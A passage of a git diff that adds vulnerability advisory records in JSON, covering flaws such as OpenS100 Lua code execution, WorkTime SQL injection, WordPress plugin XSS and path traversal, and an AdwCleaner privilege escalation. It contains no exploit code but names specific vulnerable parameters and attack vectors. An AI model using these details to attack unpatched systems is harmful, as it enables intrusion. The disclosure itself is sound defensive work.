b/advisories/unreviewed/2026/02/GHSA-vq48-824m-7qhf/GHSA-vq48-824m-7qhf.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vq48-824m-7qhf", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T15:31:35Z", + "aliases": [ + "CVE-2026-22208" + ], + "details": "OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 contain a remote code execution vulnerability via an unrestricted Lua interpreter. The Portrayal Engine initializes Lua using luaL_openlibs() without sandboxing or capability restrictions, exposing standard libraries such as 'os' and 'io' to untrusted portrayal catalogues. An attacker can provide a malicious S-100 portrayal catalogue containing Lua scripts that execute arbitrary commands with the privileges of the OpenS100 process when a user imports the catalogue and loads a chart.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22208" + }, + { + "type": "WEB", + "url": "https://github.com/S-100ExpertTeam/OpenS100/commit/753cf294434e8d3961f20a567c4d99151e3b530d" + }, + { + "type": "WEB", + "url": "https://www.mdpi.com/1424-8220/26/4/1246" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/opens100-portrayal-engine-unrestricted-lua-standard-library-access" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-749" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T15:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json b/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json new file mode 100644 index 0000000000000..44893b54091aa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vq94-wmm9-737m", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2025-15560" + ], + "details": "An authenticated attacker with minimal permissions can exploit a SQL injection in the WorkTime server \"widget\" API endpoint to inject SQL queries. If the Firebird backend is used, attackers are able to retrieve all data from the database backend. If the MSSQL backend is used the attacker can execute arbitrary SQL statements on the database backend and gain access to sensitive data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15560" + }, + { + "type": "WEB", + "url": "https://r.sec-consult.com/worktime" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T11:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json b/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json new file mode 100644 index 0000000000000..248e19f7829d5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vqcj-rgfw-jjcq", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23214" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: reject new transactions if the fs is fully read-only\n\n[BUG]\nThere is a bug report where a heavily fuzzed fs is mounted with all\nrescue mount options, which leads to the following warnings during\nunmount:\n\n BTRFS: Transaction aborted (error -22)\n Modules linked in:\n CPU: 0 UID: 0 PID: 9758 Comm: repro.out Not tainted\n 6.19.0-rc5-00002-gb71e635feefc #7 PREEMPT(full)\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\n RIP: 0010:find_free_extent_update_loop fs/btrfs/extent-tree.c:4208 [inline]\n RIP: 0010:find_free_extent+0x52f0/0x5d20 fs/btrfs/extent-tree.c:4611\n Call Trace:\n \n btrfs_reserve_extent+0x2cd/0x790 fs/btrfs/extent-tree.c:4705\n btrfs_alloc_tree_block+0x1e1/0x10e0 fs/btrfs/extent-tree.c:5157\n btrfs_force_cow_block+0x578/0x2410 fs/btrfs/ctree.c:517\n btrfs_cow_block+0x3c4/0xa80 fs/btrfs/ctree.c:708\n btrfs_search_slot+0xcad/0x2b50 fs/btrfs/ctree.c:2130\n btrfs_truncate_inode_items+0x45d/0x2350 fs/btrfs/inode-item.c:499\n btrfs_evict_inode+0x923/0xe70 fs/btrfs/inode.c:5628\n evict+0x5f4/0xae0 fs/inode.c:837\n __dentry_kill+0x209/0x660 fs/dcache.c:670\n finish_dput+0xc9/0x480 fs/dcache.c:879\n shrink_dcache_for_umount+0xa0/0x170 fs/dcache.c:1661\n generic_shutdown_super+0x67/0x2c0 fs/super.c:621\n kill_anon_super+0x3b/0x70 fs/super.c:1289\n btrfs_kill_super+0x41/0x50 fs/btrfs/super.c:2127\n deactivate_locked_super+0xbc/0x130 fs/super.c:474\n cleanup_mnt+0x425/0x4c0 fs/namespace.c:1318\n task_work_run+0x1d4/0x260 kernel/task_work.c:233\n exit_task_work include/linux/task_work.h:40 [inline]\n do_exit+0x694/0x22f0 kernel/exit.c:971\n do_group_exit+0x21c/0x2d0 kernel/exit.c:1112\n __do_sys_exit_group kernel/exit.c:1123 [inline]\n __se_sys_exit_group kernel/exit.c:1121 [inline]\n __x64_sys_exit_group+0x3f/0x40 kernel/exit.c:1121\n x64_sys_call+0x2210/0x2210 arch/x86/include/generated/asm/syscalls_64.h:232\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xe8/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n RIP: 0033:0x44f639\n Code: Unable to access opcode bytes at 0x44f60f.\n RSP: 002b:00007ffc15c4e088 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7\n RAX: ffffffffffffffda RBX: 00000000004c32f0 RCX: 000000000044f639\n RDX: 000000000000003c RSI: 00000000000000e7 RDI: 0000000000000001\n RBP: 0000000000000001 R08: ffffffffffffffc0 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000246 R12: 00000000004c32f0\n R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001\n \n\nSince rescue mount options will mark the full fs read-only, there should\nbe no new transaction triggered.\n\nBut during unmount we will evict all inodes, which can trigger a new\ntransaction, and triggers warnings on a heavily corrupted fs.\n\n[CAUSE]\nBtrfs allows new transaction even on a read-only fs, this is to allow\nlog replay happen even on read-only mounts, just like what ext4/xfs do.\n\nHowever with rescue mount options, the fs is fully read-only and cannot\nbe remounted read-write, thus in that case we should also reject any new\ntransactions.\n\n[FIX]\nIf we find the fs has rescue mount options, we should treat the fs as\nerror, so that no new transaction can be started.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23214" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1972f44c189c8aacde308fa9284e474c1a5cbd9f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3228b2eceb6c3d7e237f8a5330113dbd164fb90d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a928eecf030a9a5dc5f5ca98332699f379b91963" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vr5h-3wp5-6cwh/GHSA-vr5h-3wp5-6cwh.json b/advisories/unreviewed/2026/02/GHSA-vr5h-3wp5-6cwh/GHSA-vr5h-3wp5-6cwh.json new file mode 100644 index 0000000000000..2ca7cfa5f2868 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vr5h-3wp5-6cwh/GHSA-vr5h-3wp5-6cwh.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vr5h-3wp5-6cwh", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-23541" + ], + "details": "Missing Authorization vulnerability in WPFunnels Mail Mint mail-mint allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Mail Mint: from n/a through <= 1.19.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23541" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/mail-mint/vulnerability/wordpress-mail-mint-plugin-1-19-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vrhw-wccx-mc8w/GHSA-vrhw-wccx-mc8w.json b/advisories/unreviewed/2026/02/GHSA-vrhw-wccx-mc8w/GHSA-vrhw-wccx-mc8w.json new file mode 100644 index 0000000000000..0a7e86bd738b5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vrhw-wccx-mc8w/GHSA-vrhw-wccx-mc8w.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrhw-wccx-mc8w", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-13738" + ], + "details": "The Easy Table of Contents plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `ez-toc` shortcode in all versions up to, and including, 2.0.78 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13738" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/easy-table-of-contents/tags/2.0.77/includes/class-eztoc-post.php#L1332" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3414473%40easy-table-of-contents&new=3414473%40easy-table-of-contents&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7205c238-4419-4292-8f9c-4ccf5b69dd60?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json b/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json new file mode 100644 index 0000000000000..6df91580455d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrm4-h3r4-hh29", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27031" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27031" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json b/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json new file mode 100644 index 0000000000000..d2d8bcdb5820e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vv37-5fmc-w362", + "modified": "2026-02-20T18:31:27Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25307" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 8theme XStore Core et-core-plugin allows DOM-Based XSS.This issue affects XStore Core: from n/a through < 5.7.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25307" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/et-core-plugin/vulnerability/wordpress-xstore-core-plugin-5-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json b/advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json new file mode 100644 index 0000000000000..73ab5625a0540 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vvcr-j24q-wc29", + "modified": "2026-02-20T03:31:39Z", + "published": "2026-02-20T03:31:39Z", + "aliases": [ + "CVE-2025-30410" + ], + "details": "Sensitive data disclosure and manipulation due to missing authentication. The following products are affected: Acronis Cyber Protect Cloud Agent (Linux, macOS, Windows) before build 39870, Acronis Cyber Protect 16 (Linux, macOS, Windows) before build 39938, Acronis Cyber Protect 15 (Linux, macOS, Windows) before build 41800.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30410" + }, + { + "type": "WEB", + "url": "https://security-advisory.acronis.com/advisories/SEC-8641" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vw2m-h749-pv59/GHSA-vw2m-h749-pv59.json b/advisories/unreviewed/2026/02/GHSA-vw2m-h749-pv59/GHSA-vw2m-h749-pv59.json new file mode 100644 index 0000000000000..70460d5124236 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vw2m-h749-pv59/GHSA-vw2m-h749-pv59.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vw2m-h749-pv59", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2025-36018" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 for Z hub component is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36018" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260162" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json b/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json new file mode 100644 index 0000000000000..16e327c5f4939 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vw84-mx3m-hw5p", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1404" + ], + "details": "The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the filter parameters (e.g., 'filter_first_name') in all versions up to, and including, 2.11.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1404" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/assets/js/um-members.js#L515" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members.php#L348" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3458086" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ba62b804-f101-4e29-8304-fb2b7dad333c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json b/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json new file mode 100644 index 0000000000000..30189cc7dbd4c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vwcq-x7gx-g26f", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-8308" + ], + "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Key Software Solutions Inc. INFOREX- General Information Management System allows XSS Through HTTP Headers.This issue affects INFOREX- General Information Management System: from 2025 and before through 18022026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8308" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0075" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vx2f-2j7r-3p8x/GHSA-vx2f-2j7r-3p8x.json b/advisories/unreviewed/2026/02/GHSA-vx2f-2j7r-3p8x/GHSA-vx2f-2j7r-3p8x.json new file mode 100644 index 0000000000000..e09d79e43b652 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vx2f-2j7r-3p8x/GHSA-vx2f-2j7r-3p8x.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vx2f-2j7r-3p8x", + "modified": "2026-02-19T00:30:28Z", + "published": "2026-02-19T00:30:28Z", + "aliases": [ + "CVE-2019-25349" + ], + "details": "ScadaApp for iOS 1.1.4.0 contains a denial of service vulnerability that allows attackers to crash the application by inputting an oversized buffer in the Servername field. Attackers can paste a 257-character buffer during login to trigger an application crash on iOS devices.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25349" + }, + { + "type": "WEB", + "url": "https://apps.apple.com/ca/app/scadaapp/id1206266634" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47678" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/scadaapp-for-ios-servername-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vxf7-pjj6-wh93/GHSA-vxf7-pjj6-wh93.json b/advisories/unreviewed/2026/02/GHSA-vxf7-pjj6-wh93/GHSA-vxf7-pjj6-wh93.json new file mode 100644 index 0000000000000..e9dfb8c5d9582 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vxf7-pjj6-wh93/GHSA-vxf7-pjj6-wh93.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vxf7-pjj6-wh93", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67979" + ], + "details": "Improper Control of Generation of Code ('Code Injection') vulnerability in WesternDeal WPForms Google Sheet Connector gsheetconnector-wpforms allows Code Injection.This issue affects WPForms Google Sheet Connector: from n/a through <= 4.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67979" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/gsheetconnector-wpforms/vulnerability/wordpress-wpforms-google-sheet-connector-plugin-4-0-1-remote-code-execution-rce-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json b/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json new file mode 100644 index 0000000000000..28da835b79ca9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w246-2vcp-75v8", + "modified": "2026-02-20T21:31:23Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-27503" + ], + "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in admin/log.php via the search query parameter. When an authenticated administrator views a crafted URL, the application embeds the unsanitized parameter value directly into an HTML input value attribute, allowing attacker-supplied JavaScript to execute in the administrator's browser. This can enable session theft, administrative action forgery, or other browser-based compromise in the context of an admin user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27503" + }, + { + "type": "WEB", + "url": "https://github.com/sa2blv/SVXportal/blob/master/admin/log.php" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/svxportal-admin-log-php-search-reflected-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json b/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json new file mode 100644 index 0000000000000..e9d68aa6beda3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2hw-vq92-cm3x", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69380" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vanquish Upload Files Anywhere wp-upload-files-anywhere allows Path Traversal.This issue affects Upload Files Anywhere: from n/a through <= 2.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69380" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-upload-files-anywhere/vulnerability/wordpress-upload-files-anywhere-plugin-2-8-arbitrary-file-download-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w2v5-vxvg-mqgh/GHSA-w2v5-vxvg-mqgh.json b/advisories/unreviewed/2026/02/GHSA-w2v5-vxvg-mqgh/GHSA-w2v5-vxvg-mqgh.json new file mode 100644 index 0000000000000..a3c5d1f63ae8c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2v5-vxvg-mqgh/GHSA-w2v5-vxvg-mqgh.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2v5-vxvg-mqgh", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T18:32:57Z", + "aliases": [ + "CVE-2025-67905" + ], + "details": "Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an insecure log file delete operation in which the target location is user-controllable, allowing a non-admin user to escalate privileges to SYSTEM via a symbolic link, a related issue to CVE-2023-28892. To exploit this, an attacker must create a file in a given folder path and intercept the application log file deletion flow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67905" + }, + { + "type": "WEB", + "url": "https://Malwarebytes.com" + }, + { + "type": "WEB", + "url": "https://www.malwarebytes.com/secure/cves/cve-2025-67905" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T17:21:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json b/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json new file mode 100644 index 0000000000000..a744ef0b04dbf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2w8-j4gc-v26q", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2026-2426" + ], + "details": "The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'file' parameter in the file deletion 